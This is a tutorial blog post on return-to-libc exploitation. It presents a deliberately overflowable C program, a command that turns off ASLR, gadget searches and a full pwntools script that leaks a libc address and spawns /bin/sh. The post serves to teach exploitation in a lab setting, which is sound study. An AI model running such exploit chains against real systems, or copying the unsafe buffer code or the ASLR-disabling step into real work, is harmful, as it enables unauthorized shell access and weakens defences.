Binary Exploitation Series

Introduction

Welcome to the fascinating world of binary exploitation, where we delve into the intricate art of manipulating computer programs to gain unauthorized access, uncover vulnerabilities, and expand our understanding of software security. In this blog post, we’ll embark on a journey into the technique known as “return to libc,” a classic method employed by exploit developers to bypass security mechanisms and gain control of a vulnerable program.

As technology advances, so do the complexities and challenges associated with securing software systems. To ensure robustness, developers implement various defense mechanisms, such as address space layout randomization (ASLR), stack canaries, and non-executable stack (NX). However, even the most fortified applications can sometimes possess vulnerabilities that clever attackers can exploit.

At its core, “return to libc” is a technique used to bypass these security measures by manipulating the program’s control flow and leveraging existing functions within the C library (libc) to achieve arbitrary code execution. This technique relies on the fact that the C library is mapped into the address space of virtually every dynamically linked executable, making it a valuable resource for attackers seeking to execute code in the context of the exploited program.

The beauty of return to libc lies in how it copes with the security mechanisms mentioned earlier. NX is sidestepped entirely, because no injected code is ever executed. ASLR randomizes the base addresses of the stack, the heap, and shared libraries such as libc on every run, making it harder for attackers to predict addresses. However, the offsets of functions inside a given libc build remain constant, so leaking a single libc address at runtime is enough to compute the base address and locate every other function reliably.

/* Compile: gcc -fno-stack-protector ret2libc.c -o vuln          */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

A successful “return to libc” attack allows an attacker to achieve various malicious objectives. Here are a few examples:

  • Execute Arbitrary Shell Commands: By redirecting the control flow to the system() function from the C library, an attacker can execute arbitrary shell commands within the context of the exploited program. This provides them with unauthorized access and control over the system, enabling them to perform actions like modifying files, stealing data, or even launching further attacks.
  • Privilege Escalation: If the exploited program runs with elevated privileges, for example as a privileged user or as a setuid binary, an attacker can leverage “return to libc” to escalate their privileges. By calling functions like setuid() or execve() from the C library, the attacker can perform actions that would otherwise be restricted.
  • Bypass Security Mechanisms: “Return to libc” was designed to defeat the non-executable stack (NX): no injected shellcode runs, because the chain only reuses code that is already mapped as executable. ASLR is not bypassed by the technique itself. When ASLR is enabled, libc is loaded at a different base address on every run, so the attacker first needs an information leak (for example, printing a GOT entry) and can then compute every other libc address from fixed offsets. Stack canaries are not bypassed either: a linear overflow that reaches the return address also overwrites the canary, so the attacker must leak the canary first or use a write primitive that skips it. The example program in this post is compiled with -fno-stack-protector for that reason.

The first stage of a full return to libc chain leaks a libc address. It needs the following pieces and steps:

  • Padding: filler bytes up to the saved return address, the value that ret loads into RIP (the instruction pointer).
  • A pop rdi gadget: this gadget pops a value from the stack into the rdi register, which carries the first argument to a function in the x86-64 calling convention. You can search for such gadgets using tools like ROPgadget or by analyzing the binary with tools like objdump or Ghidra.
  • The puts@plt entry: this is the address of the PLT (Procedure Linkage Table) entry for the puts() function. The PLT is a mechanism used for dynamic function resolution in the binary. You can find the address of puts@plt by examining the binary with tools like objdump or Ghidra.
  • The puts@got entry: this is the Global Offset Table (GOT) entry for the puts() function. The GOT stores the actual addresses of dynamically linked functions. You can find the address of puts@got by examining the binary with tools like objdump or Ghidra.
  • Execute the payload: Send the payload to the vulnerable program, triggering the exploitation process. The payload should cause the program to execute the pop rdi gadget, which loads the puts@got address into rdi, and then call puts@plt to print the leaked address.
  • Extract the leaked libc address: Once the payload has run, the program prints the address of the puts() function stored in the GOT. Subtracting the offset of puts() in libc from this address gives the base address of the loaded libc library. With the libc base address, you can find other libc functions for further exploitation.
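The arithmetic in the last step can be sketched in plain Python. The leaked bytes and the puts() offset below are made-up values chosen for illustration, not taken from a real libc; in practice the offset must come from the exact libc build the target uses.

```python
import struct

# Hypothetical values for illustration only
leaked_line = b"\x50\x0e\x88\xf7\xff\x7f\n"  # raw bytes printed by puts(), newline included
PUTS_OFFSET = 0x80e50                         # assumed offset of puts() inside libc


def decode_leak(line: bytes) -> int:
    """Turn the raw little-endian bytes printed by puts() into an integer."""
    raw = line.rstrip(b"\n")     # puts() appends a newline
    raw = raw.ljust(8, b"\x00")  # puts() stops at the first null byte, so pad to 8 bytes
    return struct.unpack("<Q", raw)[0]


leaked_puts = decode_leak(leaked_line)
libc_base = leaked_puts - PUTS_OFFSET

print(hex(leaked_puts))
print(hex(libc_base))
```

A quick sanity check is that the computed base should be page aligned (its last three hex digits are 000). If it is not, the offset most likely belongs to a different libc version.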

How the Leak Works

The leak works by taking advantage of the Global Offset Table (GOT) and the Procedure Linkage Table (PLT) entries in the binary, along with a pop rdi gadget, to obtain the address of the puts() function from the libc library.

  1. GOT Entry for puts(): The GOT is a table that holds the addresses of dynamically linked functions. When a function from an external library, such as puts(), is called, the program reads its address from the GOT. With lazy binding, the GOT entry for puts() initially points back into the PLT and is replaced by the real libc address the first time puts() is called; with full RELRO, it is filled in when the program is loaded.
  2. PLT Entry for puts(): The Procedure Linkage Table (PLT) is a mechanism used for dynamic function resolution. The PLT entry for puts() is a small piece of code responsible for looking up and resolving the actual address of the puts() function in the libc library.
  3. pop rdi gadget: A pop rdi gadget is a sequence of instructions in the binary that pops a value from the stack into the rdi register. The rdi register is commonly used for passing the first argument to functions in the x86-64 calling convention.
  4. Crafting the Payload: The payload is a sequence of addresses placed on the stack. After the padding, it contains the address of the pop rdi gadget, followed by the address of the puts@got entry, and finally the address of the puts@plt entry.
  5. Execution of the Payload: When the vulnerable program executes the crafted payload, it first encounters the pop rdi gadget. This instruction pops the next value from the stack into the rdi register, which is the address of the puts@got entry.
  6. Calling puts@plt: The ret at the end of the gadget pops the next value, the address of puts@plt, into RIP. The PLT stub then jumps through the GOT to the actual puts() function in libc.
  7. Printing the Leaked Address: puts() runs with the address of the puts@got entry in the rdi register, so it treats the GOT entry as a string and prints its bytes up to the first null byte. Because vuln() has already called puts() before returning, the entry holds the resolved address of puts() inside libc by this point. Those printed bytes are the leaked libc address.
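The stack layout described in steps 4 to 6 can be sketched as follows. This is a minimal illustration using only the standard library; all three addresses are hypothetical placeholders, and the 104-byte offset is the one determined for this particular binary.

```python
import struct

# Hypothetical addresses for illustration only
POP_RDI_RET = 0x401233  # address of a "pop rdi; ret" gadget
PUTS_GOT = 0x404018     # GOT slot holding the resolved address of puts()
PUTS_PLT = 0x401030     # PLT stub that jumps through that GOT slot
OFFSET = 104            # bytes of padding before the saved return address


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


payload = b"A" * OFFSET
payload += p64(POP_RDI_RET)  # overwrites the saved return address
payload += p64(PUTS_GOT)     # popped into rdi by the gadget
payload += p64(PUTS_PLT)     # reached by the gadget's ret: puts(puts@got)

print(len(payload))
```

Each entry occupies one 8-byte stack slot, which is why the order of the three values matters: the gadget consumes the slot directly after its own address.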

Finding the Padding

The fastest way to find the padding is to use gdb-peda, which has a command called pattern create that generates a non-repeating string of a given length.
After creating the cyclic pattern, type r to start the program. When the program asks for user input, paste the pattern and press ENTER.

We can see that the program crashed at 0x00005555555551ac in vuln().
The pattern search command then searches the registers for pieces of the pattern and reports their offsets.

Using the Information

From this output we can see that the part of the pattern RSP (the stack pointer) points to starts 104 bytes into our input. Because the crash happens on the ret at the end of vuln(), RSP points to the saved return address at that moment, so we need 104 bytes of padding to reach it.
This means that the 8 bytes following the 104-byte padding overwrite the saved return address, which ret then loads into RIP (the instruction pointer).
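To make the idea behind the cyclic pattern concrete, here is a minimal sketch in plain Python. It uses the Metasploit-style Aa0Aa1Aa2... sequence rather than peda's own algorithm, and the function names are made up for this example. Because every 8-byte window of the pattern is unique, the bytes found at RSP identify exactly one offset.

```python
import string


def pattern_create(length: int) -> bytes:
    """Build a non-repeating pattern such as Aa0Aa1Aa2... of the given length."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode()
    raise ValueError("requested pattern is too long")


def pattern_offset(pattern: bytes, needle: bytes) -> int:
    """Return the position of needle inside pattern, or -1 if absent."""
    return pattern.find(needle)


pattern = pattern_create(200)
at_rsp = pattern[104:112]  # pretend these 8 bytes were found at RSP after the crash
print(pattern_offset(pattern, at_rsp))  # prints 104
```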

Finding a pop rdi Gadget

This process is quite simple because there are tools that will automatically find the gadgets for us: https://github.com/JonathanSalwan/ROPgadget

python3 ROPgadget.py --binary ./vuln | grep "pop rdi"

Putting it Together

In order to test this, we will write a Python script using pwntools (https://docs.pwntools.com/en/stable/install.html).
The pwntools library is a powerful and widely used Python library designed for binary exploitation, particularly in the context of Capture The Flag (CTF) competitions and exploit development. It provides a comprehensive set of tools and utilities to assist in various stages of exploit development, including remote communication, payload generation, and exploitation techniques.

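from pwn import *
#context.log_level='DEBUG'

elf = ELF("./vuln", checksec=False)
# elf.got / elf.plt / elf.symbols are absolute only for a non-PIE binary.
# For a PIE build with ASLR disabled, set the load base first, for example
# (typical value on x86-64 Linux, verify it in gdb):
#elf.address = 0x555555554000
libc = elf.libc
rop = ROP(elf)

def start():
	if not args.REMOTE:
		return process("./vuln")
	else:
		return remote("localhost", 1337)

p = start()

def main():

	# Gadgets and addresses taken from the binary itself
	pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0]
	ret = (rop.find_gadget(['ret']))[0]	# single ret, used for stack alignment
	puts_got = elf.got['puts']
	puts_plt = elf.plt['puts']
	main_addr = elf.symbols['main']

	# Stage 1: call puts(puts@got) to leak a libc address
	payload = b""
	payload += b"A"*104
	payload += p64(pop_rdi)
	payload += p64(puts_got)
	payload += p64(puts_plt)
	payload += p64(main_addr)	# return to main so a second payload can be sent

	p.sendline(payload)

	# Skip the program's regular output; the next line is the leak
	p.recvuntil(b"No shell for you :(\n")

	# puts() prints the raw bytes up to the first null byte, so pad to 8 bytes
	leaked_puts = u64(p.recvline().rstrip(b"\n").ljust(8, b"\x00"))
	log.info("puts@leak: " + hex(leaked_puts))

	# Rebase libc so that symbol lookups return runtime addresses
	libc.address = leaked_puts - libc.symbols['puts']
	system = libc.symbols['system']
	bin_sh = next(libc.search(b"/bin/sh"))

	# Stage 2: call system("/bin/sh")
	payload = b""
	payload += b"A"*104
	payload += p64(ret)	# keeps the stack 16-byte aligned for system()
	payload += p64(pop_rdi)
	payload += p64(bin_sh)
	payload += p64(system)

	p.sendline(payload)

	p.interactive()

if __name__=="__main__":
	main()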

Explanation

  1. Leak the Address of puts(): The exploit begins by constructing a payload. It starts with a buffer overflow, filling 104 bytes of padding followed by the address of a pop rdi gadget. This gadget will load the next value from the stack into the rdi register. The payload then includes the address of the puts@got entry (the Global Offset Table entry for the puts() function) and the address of the puts@plt entry (the Procedure Linkage Table entry for puts()). This payload is sent to the vulnerable program.

  2. Retrieve the Leaked Address: After sending the payload, the exploit discards the program's regular output and then reads the line that puts() printed, which contains the raw bytes of the puts() address stored in the GOT. The code pads these bytes to 8, converts them to an integer, and calculates the base address of the libc library by subtracting the offset of puts() in libc.

  3. Calculate Addresses: Using the leaked libc base address, the exploit computes the addresses of the system() function and the /bin/sh string in libc. These addresses are required to execute shell commands.

  4. Construct the Final Payload: The payload is constructed similarly to before, starting with the same 104 bytes of padding. It includes a single ret gadget that keeps the stack 16-byte aligned, the pop rdi gadget, the address of /bin/sh, and the address of system().

  5. Send the Final Payload: The payload is sent to the vulnerable program, which causes it to execute system("/bin/sh"), providing a shell that runs with the privileges of the vulnerable process.

  6. Interactive Shell: Finally, the exploit enters an interactive shell, allowing the user to interact with the compromised system.
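The reason for the extra ret in the final payload can be illustrated with a tiny model of the stack pointer. This is a sketch under the System V x86-64 convention, where a function entered through a normal call sees rsp % 16 == 8; the function name is made up for this example. Whether a misaligned system() actually crashes depends on the libc build, so treat this as a rule of thumb rather than a guarantee.

```python
def rsp_mod16_at_entry(chain_slots: int) -> int:
    """
    Return rsp % 16 at the moment the last address in the chain starts executing.

    When vuln() reaches its ret, rsp % 16 == 8 (the same state as right after
    the call into vuln()). Every 8-byte slot consumed by a ret or a pop moves
    rsp up by 8.
    """
    return (8 + 8 * chain_slots) % 16


without_ret = ["pop rdi; ret", "/bin/sh", "system"]
with_ret = ["ret"] + without_ret

# A function expects rsp % 16 == 8 on entry
print(rsp_mod16_at_entry(len(without_ret)))  # 0: misaligned for system()
print(rsp_mod16_at_entry(len(with_ret)))     # 8: aligned, as after a normal call
```

With an odd number of slots the chain enters system() with rsp % 16 == 0, which can fault on aligned SSE instructions inside libc; the single ret adds one slot and restores the expected alignment.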

In conclusion, “return to libc” exploitation is a powerful technique that allows attackers to leverage the functionality of libc functions to achieve their malicious objectives. By redirecting the control flow to the C library, attackers can execute arbitrary shell commands, escalate privileges, bypass security mechanisms, and even achieve remote code execution.

Remember, the goal is not only to understand and exploit vulnerabilities but also to contribute to a safer digital landscape. By sharing knowledge, collaborating, and working together, we can collectively raise the bar on software security and protect against potential threats.

So, let’s continue to learn, innovate, and make a positive impact in the world of cybersecurity. Together, we can build resilient systems and stay one step ahead of those who seek to compromise them.